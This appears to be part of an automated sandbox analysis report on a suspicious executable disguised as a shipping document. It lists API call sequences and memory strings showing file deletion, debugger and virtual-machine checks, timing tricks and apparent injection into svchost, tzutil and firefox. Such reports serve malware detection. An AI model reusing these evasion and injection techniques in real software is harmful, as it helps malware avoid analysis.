                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0099EF95
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0099F0F2
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0099F3F3
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_009937EF
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00993B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00993B12
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0099BCBC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F8C8A0 FindFirstFileW,FindNextFileW,FindClose,6_2_02F8C8A0
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_009349A0
                Source: DRAFT COPY BL, CI & PL.exe, 00000000.00000002.1708587090.0000000000F71000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareworkstation.exe4
                Source: oFlOzErifOVgUf.exe, 00000005.00000002.3520725099.000000000116E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO(gNe
                Source: tzutil.exe, 00000006.00000002.3520285479.000000000327D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllc
                Source: firefox.exe, 00000007.00000002.2519674346.00000156FC3EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllPP
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\tzutil.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7096E rdtsc 1_2_03C7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00417AA3 LdrLoadDll,1_2_00417AA3
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009A3F09 BlockInput,0_2_009A3F09
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00933B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00933B3A
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00965A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00965A7C
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00934B37 LoadLibraryA,GetProcAddress,0_2_00934B37
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_010D8488 mov eax, dword ptr fs:[00000030h]0_2_010D8488
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_010D9A98 mov eax, dword ptr fs:[00000030h]0_2_010D9A98
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_010D9AF8 mov eax, dword ptr fs:[00000030h]0_2_010D9AF8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC3CD mov eax, dword ptr fs:[00000030h]1_2_03CEC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A3C0 mov eax, dword ptr fs:[00000030h]1_2_03C3A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C383C0 mov eax, dword ptr fs:[00000030h]1_2_03C383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB63C0 mov eax, dword ptr fs:[00000030h]1_2_03CB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov ecx, dword ptr fs:[00000030h]1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE3DB mov eax, dword ptr fs:[00000030h]1_2_03CDE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h]1_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD43D4 mov eax, dword ptr fs:[00000030h]1_2_03CD43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C403E9 mov eax, dword ptr fs:[00000030h]1_2_03C403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F0 mov eax, dword ptr fs:[00000030h]1_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C663FF mov eax, dword ptr fs:[00000030h]1_2_03C663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2E388 mov eax, dword ptr fs:[00000030h]1_2_03C2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h]1_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5438F mov eax, dword ptr fs:[00000030h]1_2_03C5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C28397 mov eax, dword ptr fs:[00000030h]1_2_03C28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB2349 mov eax, dword ptr fs:[00000030h]1_2_03CB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov ecx, dword ptr fs:[00000030h]1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB035C mov eax, dword ptr fs:[00000030h]1_2_03CB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA352 mov eax, dword ptr fs:[00000030h]1_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD8350 mov ecx, dword ptr fs:[00000030h]1_2_03CD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0634F mov eax, dword ptr fs:[00000030h]1_2_03D0634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD437C mov eax, dword ptr fs:[00000030h]1_2_03CD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6A30B mov eax, dword ptr fs:[00000030h]1_2_03C6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C310 mov ecx, dword ptr fs:[00000030h]1_2_03C2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C50310 mov ecx, dword ptr fs:[00000030h]1_2_03C50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h]1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov ecx, dword ptr fs:[00000030h]1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h]1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D08324 mov eax, dword ptr fs:[00000030h]1_2_03D08324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3A2C3 mov eax, dword ptr fs:[00000030h]1_2_03C3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D062D6 mov eax, dword ptr fs:[00000030h]1_2_03D062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402E1 mov eax, dword ptr fs:[00000030h]1_2_03C402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h]1_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E284 mov eax, dword ptr fs:[00000030h]1_2_03C6E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB0283 mov eax, dword ptr fs:[00000030h]1_2_03CB0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h]1_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C402A0 mov eax, dword ptr fs:[00000030h]1_2_03C402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov ecx, dword ptr fs:[00000030h]1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC62A0 mov eax, dword ptr fs:[00000030h]1_2_03CC62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8243 mov eax, dword ptr fs:[00000030h]1_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB8243 mov ecx, dword ptr fs:[00000030h]1_2_03CB8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0625D mov eax, dword ptr fs:[00000030h]1_2_03D0625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A250 mov eax, dword ptr fs:[00000030h]1_2_03C2A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36259 mov eax, dword ptr fs:[00000030h]1_2_03C36259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h]1_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEA250 mov eax, dword ptr fs:[00000030h]1_2_03CEA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C34260 mov eax, dword ptr fs:[00000030h]1_2_03C34260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2826B mov eax, dword ptr fs:[00000030h]1_2_03C2826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0274 mov eax, dword ptr fs:[00000030h]1_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2823B mov eax, dword ptr fs:[00000030h]1_2_03C2823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]1_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF61C3 mov eax, dword ptr fs:[00000030h]1_2_03CF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov ecx, dword ptr fs:[00000030h]1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAE1D0 mov eax, dword ptr fs:[00000030h]1_2_03CAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D061E5 mov eax, dword ptr fs:[00000030h]1_2_03D061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C601F8 mov eax, dword ptr fs:[00000030h]1_2_03C601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C70185 mov eax, dword ptr fs:[00000030h]1_2_03C70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]1_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEC188 mov eax, dword ptr fs:[00000030h]1_2_03CEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD4180 mov eax, dword ptr fs:[00000030h]1_2_03CD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB019F mov eax, dword ptr fs:[00000030h]1_2_03CB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A197 mov eax, dword ptr fs:[00000030h]1_2_03C2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov ecx, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC4144 mov eax, dword ptr fs:[00000030h]1_2_03CC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C156 mov eax, dword ptr fs:[00000030h]1_2_03C2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC8158 mov eax, dword ptr fs:[00000030h]1_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C36154 mov eax, dword ptr fs:[00000030h]1_2_03C36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]1_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D04164 mov eax, dword ptr fs:[00000030h]1_2_03D04164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov eax, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDE10E mov ecx, dword ptr fs:[00000030h]1_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov ecx, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA118 mov eax, dword ptr fs:[00000030h]1_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF0115 mov eax, dword ptr fs:[00000030h]1_2_03CF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60124 mov eax, dword ptr fs:[00000030h]1_2_03C60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB20DE mov eax, dword ptr fs:[00000030h]1_2_03CB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]1_2_03C2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C380E9 mov eax, dword ptr fs:[00000030h]1_2_03C380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB60E0 mov eax, dword ptr fs:[00000030h]1_2_03CB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]1_2_03C2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C720F0 mov ecx, dword ptr fs:[00000030h]1_2_03C720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3208A mov eax, dword ptr fs:[00000030h]1_2_03C3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C280A0 mov eax, dword ptr fs:[00000030h]1_2_03C280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC80A8 mov eax, dword ptr fs:[00000030h]1_2_03CC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov eax, dword ptr fs:[00000030h]1_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]1_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32050 mov eax, dword ptr fs:[00000030h]1_2_03C32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB6050 mov eax, dword ptr fs:[00000030h]1_2_03CB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5C073 mov eax, dword ptr fs:[00000030h]1_2_03C5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4000 mov ecx, dword ptr fs:[00000030h]1_2_03CB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD2000 mov eax, dword ptr fs:[00000030h]1_2_03CD2000
